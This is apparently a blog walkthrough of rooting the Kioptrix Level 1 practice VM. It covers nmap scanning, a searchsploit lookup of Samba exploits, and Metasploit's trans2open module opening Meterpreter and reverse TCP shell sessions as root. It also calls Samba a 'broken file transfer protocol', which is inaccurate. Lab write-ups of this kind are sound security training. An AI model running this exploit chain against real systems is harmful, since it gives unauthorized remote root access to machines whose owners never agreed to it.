Gaining root access with Metasploit
Lets crack Kioptrix level 1 , its a virtual machine with vulnerable softwares . We learn it by doing.
Install Kioptrix1
Download it from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/#
Config the settings as follow:
Create a new Virtual machine
- Set the OS to Linux - Ubuntu x64 (Press Next)
- Give it 1 GB RAM (Press Next)
- Select “Use existing virtual hard drive disk file” option and point it to the location where the Kioptrix .vmdk file is located (Press Create)
Once the VM is created, right click on it and press “Settings”
- Go to ‘Storage’ section and remove the Kioptrix vmdk from “Controller: SATA” Storage tree.
- Add the Kioptrix .vmdk to ‘Controller:IDE’ Storage tree
- Go to “Network” section and select “Host-only Adapter” under “Attached to” drop-down menu.
- Expand the “Advanced” options and change your “Adapter Type” to PCnet-PCI II (Am79C970A)”
credits: https://www.reddit.com/r/netsecstudents/comments/72n2q2/kioptrix_level_11_vm_setup_problem/
Recon
nmap 192.168.56.0/24
root@kali:~# nmap 192.168.56.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 21:39 PST
Nmap scan report for 192.168.56.1
Host is up (0.00012s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.000034s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BC:B6:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00011s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:65:A7:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0000040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.48 seconds
The 192.168.56.103 is our target.
Lets check the service entry point to see if there is an CVE.
root@kali:~# nmap -sSV --version-intensity 9 192.168.56.103
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 21:43 PST
Nmap scan report for 192.168.56.103
Host is up (0.000087s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:65:A7:4D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
Searching for CVE & exploits
Back to our kali, Lets search for the related exploit for samba.
Samba is a well known broken file transfer protocol.
If you see this, just try and pwn it.
root@kali:~# searchsploit samba [84/84
----------------------------------------------------------------------------- ---------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ---------------------------------------
GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions | exploits/php/webapps/4575.txt
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Servi | exploits/windows/dos/148.sh
SWAT Samba Web Administration Tool - Cross-Site Request Forgery | exploits/cgi/webapps/17577.txt
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.0.7 - SWAT Logfile Permissions | exploits/linux/local/20341.sh
Samba 2.0.7 - SWAT Logging Failure | exploits/unix/remote/20340.c
Samba 2.0.7 - SWAT Symlink (1) | exploits/linux/local/20338.c
Samba 2.0.7 - SWAT Symlink (2) | exploits/linux/local/20339.sh
Samba 2.0.x - Insecure TMP File Symbolic Link | exploits/linux/local/20776.c
Samba 2.0.x/2.2 - Arbitrary File Creation | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalat | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
...
Its alot, Lets filter only important exploits to test.
root@kali:~# searchsploit samba | grep remote | grep Buffer
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | exploits/unix/remote/22471.txt
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | exploits/linux/remote/364.pl
Sambar Server 6 - Search Results Buffer Overflow (Metasploit) | exploits/windows/remote/16756.rb
root@kali:~# ^C
First attempt
Lets try the exploits/linux/remote/16321.rb exploit for this case.
msfconsole
msf5 > search nttrans # search for the related exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
1 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
msf5 > use exploit/multi/samba/nttrans
msf5 exploit(multi/samba/nttrans) > set rhost 192.168.56.103
rhost => 192.168.56.103
msf5 exploit(multi/samba/nttrans) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[-] 192.168.56.103:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
The exploit seems not working . Lets examine the details by double verify the payloads and the targets.
msf5 exploit(multi/samba/nttrans) > show targets
Exploit targets:
Id Name
-- ----
0 Samba 2.2.x Linux x86
msf5 exploit(multi/samba/nttrans) > show options
Module options (exploit/multi/samba/nttrans):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.103 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x Linux x86
The targets is correct.
However, the payload options doesn’t seems working. Lets change this to some generic payloads.
msf5 exploit(multi/samba/nttrans) > search payload -o all-payloads.txt
msf5 exploit(multi/samba/nttrans) > cat all-payloads.txt | grep tcp | grep generic
[*] exec: cat all-payloads.txt | grep tcp | grep generic
"496","payload/generic/shell_bind_tcp","","normal","No","Generic Command Shell, Bind TCP Inline"
"497","payload/generic/shell_reverse_tcp","","normal","No","Generic Command Shell, Reverse TCP Inline"
msf5 exploit(multi/samba/nttrans) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
ls
[-] 192.168.56.103:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
It doesn’t seems working even we changed the payload. Lets try another one.
Second attempt
msf5 exploit(linux/samba/trans2open) > show options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.103 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
msf5 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.103:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffafc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.103:32769) at 2019-11-04 22:25:48 -0800
[*] 192.168.56.103 - Meterpreter session 1 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff9fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.103:32770) at 2019-11-04 22:25:49 -0800
[*] 192.168.56.103 - Meterpreter session 2 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff8fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] 192.168.56.103 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 127.0.0.1) at 2019-11-04 22:25:50 -0800
[*] 192.168.56.103:139 - Trying return address 0xbffff7fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 4 opened (192.168.56.101:4444 -> 192.168.56.103:32772) at 2019-11-04 22:25:52 -0800
[*] 192.168.56.103 - Meterpreter session 4 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff6fc...
^C[-] 192.168.56.103:139 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.103:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffafc...
[*] Command shell session 5 opened (192.168.56.101:4444 -> 192.168.56.103:32773) at 2019-11-04 22:26:47 -0800
ls
whoami
root
ifconfig
//bin/sh: ifconfig: command not found
pwd
/tmp
history
last
reboot system boot 2.4.7-10 Tue Nov 5 05:39 (00:48)
reboot system boot 2.4.7-10 Tue Nov 5 05:35 (00:51)
reboot system boot 2.4.7-10 Tue Nov 5 05:28 (00:59)
reboot system boot 2.4.7-10 Tue Nov 5 05:25 (01:02)
wtmp begins Tue Nov 5 05:25:06 2019
^C
Abort session 5? [y/N] y
""
[*] 192.168.56.103 - Command shell session 5 closed. Reason: User exit
Got it.
Sometimes the exploit is partly working, we need to look for the details and make some small modifications to it in order to crack.